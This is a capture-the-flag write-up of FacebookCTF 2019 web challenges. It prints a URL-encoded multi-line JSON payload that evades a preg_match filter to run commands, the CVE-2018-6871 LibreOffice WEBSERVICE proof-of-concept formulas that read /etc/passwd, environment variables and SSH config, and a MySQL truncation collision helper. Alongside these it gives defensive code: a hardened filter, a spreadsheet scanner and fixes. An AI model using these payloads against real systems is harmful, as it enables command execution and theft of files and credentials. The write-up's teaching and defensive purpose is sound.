FacebookCTF2019 web writeup

facebookCTF2019

rceservice - bypassing preg_match

http://challenges.fbctf.com:8085

We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only let you run 'ls'

(This problem does not require any brute force or scanning. 
We will ban your team if we detect brute force or scanning).

Web Administration Interface

Enter command as JSON:

I did not solve this one during the competition, so this is a reproduction after the fact. According to the writeups the service takes the command as JSON, but it clearly filters a lot of things.

Input:

{"cmd":"ls"}

Attempting to run command:
index.php

Pretty much any other input yields

Hacking attempt detected. The filter rule turned out to be the following. Note what the character class leaves unblocked: lowercase letters, space, the double quote, the colon and the two braces, which is exactly enough for a JSON object carrying a lowercase command, while the slash, the hyphen, digits and uppercase letters are all blocked:

} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
}

So the problem reduces to bypassing preg_match.

One of the most common ways to bypass a check like this is multi-line input. The pattern is anchored with ^ and $ and padded with .* on both sides, but the call uses neither the s nor the m modifier: . does not match a newline, and ^ and $ only match at the start and end of the whole string. The pattern can therefore only match a payload that sits on one line; once the JSON is spread over several lines, preg_match returns 0 and the check passes, while the JSON decoder does not care about the newlines at all.

For example:

{
    "cmd": "ls /home/rceservice"
}

Since there is no check that rejects multi-line input, we can send exactly this to the server and get a friendly response:

Note that the newlines have to be sent URL-encoded, i.e. {%0a"cmd":"ls /home/rceservice"%0a}. When I then tried to cat the flag there was no cat command; the writeup explains that the application changes its PATH variable:

putenv('PATH=/home/rceservice/jail');

Get the flag by calling cat through its absolute path:

http://challenges.fbctf.com:8085/?cmd={%0a%22cmd%22:%20%22/bin/cat%20/home/rceservice/flag%22%0a}

It turned out that the multi-line JSON trick was not the Facebook team's intended solution. The intended solution exploits PCRE's backtracking and recursion limits (pcre.backtrack_limit defaults to 1000000): when a limit is hit, preg_match does not return a match result but false, and the if (preg_match(...)) check treats false exactly like "no match", so the command runs. A robust check would treat any return value other than 0 as a rejection, for example preg_match(...) !== 0.
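As an added example (my own code, not the challenge's source or any writeup's), the filter is reproduced in Python, whose re module gives ^, $ and . the same default meaning as PCRE without the s and m modifiers. It shows the single-line command being caught by the slash, the URL-decoded getflag payload from above slipping past, the JSON decoder still yielding the command, and an unanchored version of the same token list that does catch it. The backtrack-limit route of the intended solution cannot be shown this way: Python's re has no such limit, so preg_match's false return has no counterpart here.

```python
import json
import re
from urllib.parse import unquote

# The alternation from the challenge's preg_match, copied from the PHP source.
# PHP's PCRE and Python's re agree on the default meaning of ^, $ and . here:
# no /s, so . does not match "\n"; no /m, so ^ and $ anchor the whole string.
FORBIDDEN = (
    r"alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|"
    r"declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|"
    r"help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|"
    r"readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|"
    r"typeset|ulimit|umask|unalias|unset|until|wait|while|"
    r"[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+"
)
CHALLENGE_RE = re.compile(r"^.*(" + FORBIDDEN + r").*$")  # as deployed
HARDENED_RE = re.compile(r"(" + FORBIDDEN + r")")          # no anchors, no .*


def challenge_blocks(payload: str) -> bool:
    """True when the original check would print 'Hacking attempt detected'."""
    return CHALLENGE_RE.search(payload) is not None


def hardened_blocks(payload: str) -> bool:
    """Same token list, but searched anywhere in the string, on any line."""
    return HARDENED_RE.search(payload) is not None


def extract_cmd(payload: str) -> str:
    """What the server does once the filter passes: decode the JSON and take
    'cmd'. The decoder does not care about the newlines that defeat the regex."""
    return json.loads(payload)["cmd"]


# The query string from the getflag URL, URL-decoded: %0a becomes "\n".
EXPLOIT_PAYLOAD = unquote("{%0a%22cmd%22:%20%22/bin/cat%20/home/rceservice/flag%22%0a}")
SINGLE_LINE = '{"cmd":"ls /home/rceservice"}'  # same idea on one line: the "/" is caught
HARMLESS = '{"cmd":"ls"}'                       # the only command the author allows


def summary() -> dict:
    """Run the three payloads through both filters and the decoder."""
    return {
        "harmless_blocked": challenge_blocks(HARMLESS),
        "single_line_blocked": challenge_blocks(SINGLE_LINE),
        "multiline_blocked": challenge_blocks(EXPLOIT_PAYLOAD),
        "multiline_blocked_hardened": hardened_blocks(EXPLOIT_PAYLOAD),
        "decoded_cmd": extract_cmd(EXPLOIT_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in summary().items():
        print(f"{key}: {value!r}")
```

The hardened pattern simply drops the ^.* and .*$ wrapper, so there is nothing left for a newline to break; in the PHP original the equivalent fix is to remove the wrapper (or add the s modifier) and to reject on preg_match(...) !== 0 so that a false from a hit backtrack limit is not treated as a pass.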

secret note keeper

Find the secret note that contains the fl4g!

http://challenges.fbctf.com:8082

Same thing but in tokyo: http://challenges3.fbctf.com:8082/

(Timeout is 5 seconds for links, flag is case insensitive)

This challenge is solved with CVE-2018-6871:

https://www.exploit-db.com/exploits/44022

LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure

https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure

Download poc.fods from that GitHub repository; the relevant rows look like this:

    <table:table-row table:style-name="ro2">
     <table:table-cell/>
     <table:table-cell office:value-type="string" calcext:value-type="string">
      <text:p>Current user:</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce1" table:formula="of:=&quot;/home/&quot; &amp; MID(COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;); FIND(&quot;USER=&quot;; COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;)) + LEN(&quot;USER=&quot;); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;); FIND(&quot;USER=&quot;; COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;)))-FIND(&quot;USER=&quot;; COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;))-LEN(&quot;USER=&quot;)) &amp; &quot;/&quot;" office:value-type="string" office:string-value="" calcext:value-type="error">
       <text:p>#VALUE!</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce2" table:formula="of:=FIND(&quot;:&quot;; [.F3]; [.E3])" office:value-type="float" office:value="689" calcext:value-type="float">
      <text:p>689</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce2" table:formula="of:=FIND(&quot;/home&quot;; [.F3]; FIND(&quot;:x:1000:1000:&quot;; [.F3]))" office:value-type="float" office:value="676" calcext:value-type="float">
      <text:p>676</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce2" table:formula="of:=COM.MICROSOFT.WEBSERVICE(&quot;/etc/passwd&quot;)" office:value-type="string" office:string-value="" calcext:value-type="string">
       <text:p>#VALUE!</text:p>
     </table:table-cell>
     <table:table-cell/>
     <table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string"><text:p>(change this)</text:p><text:p>Address:</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string">
      <text:p>http://localhost:8080</text:p>
     </table:table-cell>
    </table:table-row>
    <table:table-row table:style-name="ro3">
     <table:table-cell/>
     <table:table-cell office:value-type="string" calcext:value-type="string">
      <text:p>List of private keys:</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce1"/>
     <table:table-cell table:number-columns-repeated="2"/>
     <table:table-cell table:formula="of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] &amp; &quot;/.ssh/config&quot;); &quot;~&quot;; [.C3])" office:value-type="string" office:string-value="" calcext:value-type="error">
       <text:p>#VALUE!</text:p>
     </table:table-cell>
     <table:table-cell/>
     <table:table-cell office:value-type="string" calcext:value-type="string">
      <text:p>Send:</text:p>
     </table:table-cell>
     <table:table-cell/>

Change /etc/passwd in the formula to /home/libreoffice_admin/flag and upload the file:

fb{wh0_7h0u6h7_l1br30ff1c3_c4n_b3_u53ful}
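The poc works because, before LibreOffice 6.0.1, WEBSERVICE would happily fetch a local path and return its contents as a cell value (the fix restricts the function to http and https URLs). For anyone running a document conversion service, the defensive counterpart is to inspect uploaded spreadsheets for that primitive before handing them to LibreOffice. The following scanner is an added example of mine, not code from the writeup or from the poc repository: it parses a flat .fods document, finds every WEBSERVICE call in a table:formula attribute, and classifies its argument as a remote URL, a local path, or a computed expression (like the [.C3] & "/.ssh/config" cell above) that cannot be vetted statically. The sample document is constructed here from the shape of the poc.

```python
import re
import xml.etree.ElementTree as ET

# ODF namespaces used by flat ODS (.fods) files
NS = {
    "office": "urn:oasis:names:tc:opendocument:xmlns:office:1.0",
    "table": "urn:oasis:names:tc:opendocument:xmlns:table:1.0",
    "text": "urn:oasis:names:tc:opendocument:xmlns:text:1.0",
}
FORMULA_ATTR = "{%s}formula" % NS["table"]

# LibreOffice stores the function as COM.MICROSOFT.WEBSERVICE in the file
WEBSERVICE_CALL = re.compile(r"(?:COM\.MICROSOFT\.)?WEBSERVICE\s*\(", re.IGNORECASE)
STRING_LITERAL = re.compile(r'^\s*"([^"]*)"\s*$')


def _argument_text(formula: str, open_paren: int) -> str:
    """Text between the '(' at open_paren and its matching ')', ignoring
    parentheses that sit inside double-quoted string literals."""
    depth, in_string = 0, False
    for j in range(open_paren, len(formula)):
        c = formula[j]
        if c == '"':
            in_string = not in_string
        elif not in_string:
            if c == "(":
                depth += 1
            elif c == ")":
                depth -= 1
                if depth == 0:
                    return formula[open_paren + 1:j]
    return formula[open_paren + 1:]  # unbalanced formula: return what is there


def classify(argument: str):
    """('remote', url) for an http(s) literal, ('local', path) for any other
    literal, ('dynamic', expr) when the target is computed from cells or '&'."""
    m = STRING_LITERAL.match(argument)
    if not m:
        return "dynamic", argument.strip()
    target = m.group(1)
    if re.match(r"(?i)https?://", target):
        return "remote", target
    return "local", target


def scan_fods(xml_text: str):
    """One finding per WEBSERVICE call found in any table:formula attribute."""
    root = ET.fromstring(xml_text)
    findings = []
    for cell in root.iter():
        formula = cell.attrib.get(FORMULA_ATTR)
        if not formula:
            continue
        for m in WEBSERVICE_CALL.finditer(formula):
            kind, target = classify(_argument_text(formula, m.end() - 1))
            findings.append({"kind": kind, "target": target, "formula": formula})
    return findings


def should_reject(findings) -> bool:
    """Reject anything that is not a plain http(s) URL: a local path is the
    CVE-2018-6871 file read, and a computed target cannot be checked here."""
    return any(f["kind"] != "remote" for f in findings)


# Constructed sample: the shape of poc.fods cut down to four cells
SAMPLE_FODS = """<office:document
  xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
  xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0"
  xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"
  office:mimetype="application/vnd.oasis.opendocument.spreadsheet">
 <office:body><office:spreadsheet><table:table table:name="Sheet1">
  <table:table-row>
   <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE(&quot;/etc/passwd&quot;)" office:value-type="string"><text:p>#VALUE!</text:p></table:table-cell>
   <table:table-cell table:formula="of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] &amp; &quot;/.ssh/config&quot;); &quot;~&quot;; [.C3])" office:value-type="string"><text:p>#VALUE!</text:p></table:table-cell>
   <table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE(&quot;https://example.com/api&quot;)" office:value-type="string"><text:p>ok</text:p></table:table-cell>
   <table:table-cell table:formula="of:=SUM([.A1:.A2])" office:value-type="float" office:value="3"><text:p>3</text:p></table:table-cell>
  </table:table-row>
 </table:table></office:spreadsheet></office:body>
</office:document>"""

if __name__ == "__main__":
    for finding in scan_fods(SAMPLE_FODS):
        print(finding["kind"], finding["target"])
    print("reject:", should_reject(scan_fods(SAMPLE_FODS)))
```

The XML parser already unescapes &quot; and &amp; in the attribute, so the formula is inspected as LibreOffice sees it; the small parenthesis walker is there because the poc nests WEBSERVICE inside MID, FIND and SUBSTITUTE, where a plain regex up to the first ")" would cut the argument short.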

products manager

I submitted the name 'facebook' + ' '*56 + 'hack' with the secret not_so_secret and the description hacked!!!, and the product was inserted successfully. I could then view the product facebook with the secret not_so_secret and get the flag. Basically, the database silently drops everything past the column length of 64 on insert, and string comparison ignores trailing spaces by default: the duplicate-name check sees a 68-character string that differs from facebook, but what gets stored is facebook followed by 56 spaces, which compares equal to facebook.
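The two database behaviours at work here are MySQL's silent truncation of an over-long VARCHAR when STRICT_TRANS_TABLES is off and the PAD SPACE semantics of collations such as utf8mb4_general_ci, under which trailing spaces are not significant in comparisons. The following model is an added example of mine, not the challenge's code: it reproduces both behaviours in plain Python and runs the writeup's payload through a toy version of the app, whose duplicate-name check and VARCHAR(64) width are assumptions read off the writeup. The padding helper generalises the trick to any target name and column width. Two caveats for real deployments: strict sql_mode (the default since MySQL 5.7) turns the truncation into an error, and MySQL 8.0's default collation utf8mb4_0900_ai_ci is NO PAD, so the trailing spaces would then no longer be ignored.

```python
# Model of the products manager bug (added example, not the challenge's code).
# Two MySQL behaviours combine: without STRICT_TRANS_TABLES an over-long
# VARCHAR(n) is silently truncated on INSERT, and PAD SPACE collations ignore
# trailing spaces on comparison. The app's duplicate-name check (assumed from
# the writeup) runs on the raw submitted string, so a name that differs from
# 'facebook' before truncation collides with it after.

COLUMN_WIDTH = 64  # VARCHAR width implied by the ' '*56 padding in the writeup


def mysql_store(value: str, width: int = COLUMN_WIDTH) -> str:
    """What a VARCHAR(width) column keeps in non-strict sql_mode: the first
    `width` characters, with a warning instead of an error."""
    return value[:width]


def pad_space_equal(a: str, b: str) -> bool:
    """String equality under a PAD SPACE collation: trailing spaces are ignored."""
    return a.rstrip(" ") == b.rstrip(" ")


def craft_collision(target: str, suffix: str = "hack", width: int = COLUMN_WIDTH) -> str:
    """Pad `target` with spaces up to the column width and append a suffix.
    The raw string differs from target (the suffix is there), but after
    truncation the suffix is gone and the stored value compares equal."""
    if len(target) >= width:
        raise ValueError("target already fills the column; nothing to pad")
    return target + " " * (width - len(target)) + suffix


class ProductsTable:
    """Toy stand-in for the app's table and its queries (assumed shape)."""

    def __init__(self):
        self.rows = []  # (name, secret, description); name as stored

    def name_taken(self, name: str) -> bool:
        # duplicate check: SELECT ... WHERE name = <raw submitted string>
        return any(pad_space_equal(r[0], name) for r in self.rows)

    def add(self, name: str, secret: str, description: str) -> bool:
        if self.name_taken(name):
            return False
        self.rows.append((mysql_store(name), secret, description))
        return True

    def rows_named(self, name: str):
        # SELECT ... WHERE name = ?   (two rows once the collision exists)
        return [r for r in self.rows if pad_space_equal(r[0], name)]

    def lookup(self, name: str, secret: str):
        # SELECT ... WHERE name = ? AND secret = ?
        return [r for r in self.rows if pad_space_equal(r[0], name) and r[1] == secret]


def demo() -> dict:
    """Replay the writeup's insert against a table holding the target row."""
    db = ProductsTable()
    db.add("facebook", "real_secret", "constructed placeholder for the flag row")
    payload = craft_collision("facebook")  # 'facebook' + 56 spaces + 'hack'
    return {
        "payload_len": len(payload),
        "raw_collides": pad_space_equal(payload, "facebook"),
        "inserted": db.add(payload, "not_so_secret", "hacked!!!"),
        "stored_collides": pad_space_equal(mysql_store(payload), "facebook"),
        "rows_named_facebook": len(db.rows_named("facebook")),
        "login_hits": len(db.lookup("facebook", "not_so_secret")),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The gap the model exposes is that validation and storage normalise the value differently: the check compares the 68-character string, the column keeps 64, and the collation then throws the padding away. The fix is to normalise (trim and length-check) before the duplicate check, to run MySQL in strict mode so the INSERT fails instead of truncating, or to enforce uniqueness with a UNIQUE index rather than a SELECT-then-INSERT.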

easter egg

After searching for fb{ on all pages, nothing turned up.

But searching for { turned up something interesting on the careers page:

<p>Facebook's Application Security team<span style="color:white">{</span>is seeking a passionate hacker to help us secure over 2 billion users....

And searching for }:

<p>The Oculus Security Engineering team designs, builds, and supports the infrastructure and services<span style="color:white">}</span>that allow Oculus to move fast,...

Also found <span style="color:white">f, <span style="color:white">b and so on, so the hidden characters can be collected in page order with a short script:

import re
text = open("careers").read()
# each hidden character sits alone in a white-on-white span; capture just the character
hidden = re.findall(r'<span style="color:white">(.)</span>', text)
print(''.join(hidden))
fb{we're_hiring}

events

Python template injection; the writeup is at:

https://ramadistra.dev/fbctf-2019-events

hr-admin-module

PostgreSQL injection (asynchronous injection); the writeup is at:

https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md
